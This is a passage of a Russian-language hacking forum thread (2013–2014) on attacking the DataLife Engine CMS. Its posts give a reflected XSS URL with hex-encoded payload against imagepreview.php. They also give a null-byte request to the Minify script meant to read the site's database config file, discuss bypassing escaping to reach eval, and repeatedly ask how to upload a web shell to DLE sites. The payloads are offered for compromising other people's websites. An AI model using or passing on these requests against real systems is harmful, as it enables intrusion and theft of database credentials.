HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #311  
Старый 20.11.2013, 03:17
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

как нынче шелл заливают на стандартный dle ?
 
Ответить с цитированием

  #312  
Старый 21.11.2013, 11:52
t3cHn0iD
Новичок
Регистрация: 06.04.2009
Сообщений: 2
Провел на форуме:
150479

Репутация: 2
По умолчанию

Цитата:
Сообщение от ForcePush  
ForcePush said:
Нашел пассивную XSS.
Код:
Code:
http://target.com/engine/modules/imagepreview.php?image=\x27\x3E[XSS]
Заменяем все специальные символы на \x[HEX код символа].
Работает по крайней мере на 9.8 + MQ=off, подробностей точно не знаю.
Баянист, /showpost.php?p=696945&postcount=18 - оригинал
 
Ответить с цитированием

  #313  
Старый 21.11.2013, 19:22
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию

В общем, по последней дырке такая песня:

Запрос (GET):

Код HTML:
HTML:
/engine/classes/min/index.php?f=engine/data/dbconfig.php
Обработчик, который всё обламывает:

engine\classes\min\lib\Minify\Controller\MinApp.ph p

А конкретно две проверки:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/^[^,]+\\.(css|js)(?:,[^,]+\\.\\1)*$/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]])[/COLOR][/COLOR
и

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]realpath[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])[/COLOR][/COLOR
Судя по описанию патча с целсофта запрос должен быть примерно такой:

Код HTML:
HTML:
engine/classes/min/index.php?f=engine/data/dbconfig.php%00.js
Регулярка обеспечивается .js, путь null byte..

описание атаки

Но чёт не доконца катит... Кстати, .htaccess, что в дирах /cache/system не позволят прочитать файл удалённо....

Так что это так, больше для развития, или пока не убьёшь эти файлы.

PS и ещё не получается обойти проверку (обратный слэш):

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'\\'[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
PSPS И самое интересное: гугл уже в июле это обсуждал ... Участники группы так и не смогли заюзать уязвимость
 
Ответить с цитированием

  #314  
Старый 13.01.2014, 19:33
fakecoder
Guest
Сообщений: n/a
Провел на форуме:
3698

Репутация: 2
По умолчанию

Цитата:
Сообщение от slva2000  
slva2000 said:
Но чёт не доконца катит... Кстати, .htaccess, что в дирах /cache/system не позволят прочитать файл удалённо....
Так что это так, больше для развития, или пока не убьёшь эти файлы.
А зачем их читать, когда сам Minify отдаёт?

Цитата:
Сообщение от slva2000  
slva2000 said:
PS и ещё не получается обойти проверку (обратный слэш):
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]strpos[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'\\'[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
А где у Вас обратный слеш? У Вас %00.

Цитата:
Сообщение от slva2000  
slva2000 said:
PSPS И самое интересное: гугл уже в июле
это обсуждал
... Участники группы так и не смогли заюзать уязвимость
Ага, ещё скажите, что на утреннике в детском саду участники так и не смогли...

Самое интересное, что уязвимость настолько глупая, что почти наверняка можно утверждать, что "разработчики DLE" её оставили специально
 
Ответить с цитированием

  #315  
Старый 30.01.2014, 19:06
hpol
Guest
Сообщений: n/a
Провел на форуме:
21252

Репутация: 15
По умолчанию

Видел что eval вставляют в Автоматическая разбивка длинных слов , кто знает какой путь до него?
 
Ответить с цитированием

  #316  
Старый 31.01.2014, 12:33
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

на 9.7 шелл залить можно как нибудь?
 
Ответить с цитированием

  #317  
Старый 02.02.2014, 08:26
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию

Цитата:
Сообщение от hpol  
hpol said:
Видел что eval вставляют в Автоматическая разбивка длинных слов , кто знает какой путь до него?
если удастся обойти эти экранирования, то вполне

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"$"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"& #036;"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"{"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"& #123;"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"}"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"& #125;"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]chr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]chr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]92[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]);

[/
COLOR][/COLOR
 
Ответить с цитированием

  #318  
Старый 04.02.2014, 21:08
justonline
Guest
Сообщений: n/a
Провел на форуме:
179355

Репутация: 53
По умолчанию

А в чем заключалась та уязвимость, через которую похакали кучу длешных сайтов? Есть у кого хауту?) Там что-то с аватарами вроде, не гуглится
 
Ответить с цитированием

  #319  
Старый 06.02.2014, 07:56
slva2000
Новичок
Регистрация: 20.11.2009
Сообщений: 17
Провел на форуме:
23696

Репутация: -4
По умолчанию

Цитата:
Сообщение от justonline  
justonline said:
А в чем заключалась та уязвимость, через которую похакали кучу длешных сайтов? Есть у кого хауту?) Там что-то с аватарами вроде, не гуглится
старая песня?
 
Ответить с цитированием

  #320  
Старый 06.02.2014, 18:43
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

Цитата:
Сообщение от justonline  
justonline said:
А в чем заключалась та уязвимость, через которую похакали кучу длешных сайтов? Есть у кого хауту?) Там что-то с аватарами вроде, не гуглится
это останется в привате, да же спустя год
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ